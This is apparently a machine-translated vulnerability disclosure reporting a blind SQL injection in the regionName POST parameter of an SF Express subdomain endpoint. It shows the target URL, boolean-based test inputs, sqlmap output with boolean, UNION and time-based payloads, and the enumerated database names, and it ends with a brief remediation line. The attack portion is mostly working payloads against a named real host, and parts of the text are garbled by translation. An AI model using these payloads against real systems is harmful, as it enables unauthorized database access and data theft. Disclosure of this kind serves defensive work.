An injection vulnerability exists in a sub-station of Shunfeng suyun, blind injection, post injection point: http://ows-dfppe.?express.com/ows-dfp/%7bpath%7d/coverage_area! GetCoverageCityList. action post parameter: regionName = 98605 & level = 3 & lang = SC & region = us where regionName has been injected. Post Data: regionName = 98605% 25' aND 1236 = 1236 aND '% 25' =' & level = 3 & lang = SC & region = us: regionName = 98605% 25' aND 1256 = 1236 aND '% 25' =' & level = 3 & lang = SC & region = us, an exception is returned.
Sqlmap running database:
sqlmap identified the following injection points with a total of 38 HTTP(s) requests:---Place: POSTParameter: regionNameType: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: regionName=98605%' AND 2644=2644 AND '%'='&level=3&lang=sc®ion=usType: UNION queryTitle: MySQL UNION query (NULL) - 2 columnsPayload: regionName=98605%' UNION ALL SELECT NULL,CONCAT(0x7174797371,0x44644d4352736b48514e,0x716c697871)#&level=3&lang=sc®ion=usType: AND/OR time-based blindTitle: MySQL > 5.0.11 AND time-based blindPayload: regionName=98605%' AND SLEEP(5) AND '%'='&level=3&lang=sc®ion=us---[12:56:43] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0.11[12:56:43] [INFO] fetching database namesavailable databases [4]:[*] information_schema[*] mysql[*] opencms[*] test[12:56:43] [WARNING] HTTP error codes detected during run:404 (Not Found) - 21 times[12:56:43] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/ows-dfppe.sf-express.com'
Solution:Filtering and parameterization